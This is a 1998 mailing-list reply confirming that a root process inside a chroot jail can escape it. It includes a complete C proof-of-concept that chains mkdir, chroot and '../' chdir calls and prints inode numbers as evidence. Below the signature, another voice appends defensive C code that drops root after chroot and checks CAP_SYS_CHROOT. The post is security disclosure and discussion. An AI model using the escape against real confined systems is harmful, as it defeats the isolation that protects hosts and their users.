Re: Security patch for /proc

Harald Koenig (koenig@tat.physik.uni-tuebingen.de)
Thu, 2 Apr 1998 08:40:24 +0200


On Apr 01, Ion Badulescu wrote:

> On Thu, 2 Apr 1998, Jeremy Fitzhardinge wrote:
>
> > Robert Bihlmeyer wrote:
> > > Alan Cox wrote:
> > > >> mkdir("x"); chroot("x"); chdir("../../../../../../../..");
> > > >> chroot(".");
> > > You tried it? One will escape from x with that.
> >
> > Well, one was never really captured. I didn't notice the missing chdir,
> > but its well known behaviour that if you never chdir into a chroot jail,
> > you can easily "escape".
>
> You missed the point. You _are_ already in a chroot jail, this is how you
> escape from it.
>
> mkdir("foo"); chroot("foo"); chdir("foo");
>
> # you are in the "jail" now
>
> mkdir("x"); chroot("x"); chdir("../../../../../.."); chroot(".");
>
> # no more jail...

First I thought you're wrong because you missed the `chroot("/")'
after going to jail, which I thought was important in this case.

But, testing first before replying, I got the following output

/ 2053 2086
/ 2053 2086
/ 2053 2

from the output below which shows the inode number of the real /
so indeed it's possible to escape :-(

-------------------------------------------------------------------------------
#define _GNU_SOURCE            /* get_current_dir_name() is a GNU extension */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* print the cwd as the process sees it, plus device and inode of "." */
static void where(void)
{
	struct stat buf;
	char *cwd = get_current_dir_name();

	stat(".", &buf);
	printf("%s %lu %lu\n", cwd,
	       (unsigned long)buf.st_dev, (unsigned long)buf.st_ino);
	free(cwd);
}

int main(void)
{
	/* go to jail, the same way as in the quoted sequence */
	mkdir("jail", 0755);
	chroot("jail");
	chdir("jail");
#ifdef not_really_necessary_but_why_not
	chdir("/");
#endif
	where();

	/* walk up as far as possible and make that the new root */
	chdir("../../../../../../../../../../..");
	chroot(".");
	where();

	/* dig tunnel to escape... */
	mkdir("tunnel", 0755);
	chroot("tunnel");

	chdir("../../../../../../../../../../..");
	chroot(".");
	where();

	return 0;
}
-------------------------------------------------------------------------------

Harald

--
All SCSI disks will from now on                     ___       _____
be required to send an email notice                0--,|    /OOOOOOO\
24 hours prior to complete hardware failure!      <_/  /  /OOOOOOOOOOO\
                                                    \  \/OOOOOOOOOOOOOOO\
                                                      \ OOOOOOOOOOOOOOOOO|//
Harald Koenig,                                         \/\/\/\/\/\/\/\/\/
Inst.f.Theoret.Astrophysik                              //  /     \\  \
koenig@tat.physik.uni-tuebingen.de                     ^^^^^       ^^^^^
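As a defender's counterpart to the program above (an added example, my own code, not Harald's or anything posted in the thread): the escape only works while the jailed process is still allowed to call chroot(), so the usual countermeasure is chroot(), chdir("/"), then an irreversible drop of root. The /proc/self/status reader is Linux-specific, and the capability number 18 for CAP_SYS_CHROOT comes from <linux/capability.h>; the CapEff values in the test are constructed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define CAP_SYS_CHROOT_BIT 18  /* capability number from <linux/capability.h> */

/* Parse a hex capability mask as printed on the CapEff line of
 * /proc/self/status and report whether CAP_SYS_CHROOT is set. */
int capmask_has_sys_chroot(const char *hex)
{
	unsigned long long mask = strtoull(hex, NULL, 16);  /* skips leading blanks */
	return (int)((mask >> CAP_SYS_CHROOT_BIT) & 1ULL);
}

/* Effective capabilities of the calling process, read from /proc (Linux).
 * Returns 1 if chroot() would still be permitted, 0 if not, -1 on error. */
int process_has_sys_chroot(void)
{
	char line[256];
	int result = -1;
	FILE *f = fopen("/proc/self/status", "r");
	if (!f)
		return -1;
	while (fgets(line, sizeof line, f)) {
		if (strncmp(line, "CapEff:", 7) == 0) {
			result = capmask_has_sys_chroot(line + 7);
			break;
		}
	}
	fclose(f);
	return result;
}

/* Hardened confinement: chroot, move the cwd inside the new root, then give
 * up root for good so the chroot(".") step of the escape is refused (EPERM).
 * Needs root (CAP_SYS_CHROOT) to get past chroot(); returns 0 on success,
 * -1 with errno set on failure. */
int enter_jail_and_drop_root(const char *dir, uid_t uid, gid_t gid)
{
	if (chroot(dir) == -1 || chdir("/") == -1)
		return -1;
	/* supplementary groups and gid first: after setuid() they can't be changed */
	if (setgroups(0, NULL) == -1 || setgid(gid) == -1 || setuid(uid) == -1)
		return -1;
	if (uid != 0 && setuid(0) == 0) {  /* the drop must be irreversible */
		errno = EPERM;
		return -1;
	}
	return 0;
}
```

Calling process_has_sys_chroot() right after enter_jail_and_drop_root() is a cheap runtime check that the jailed process can no longer perform the second chroot() the escape relies on.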
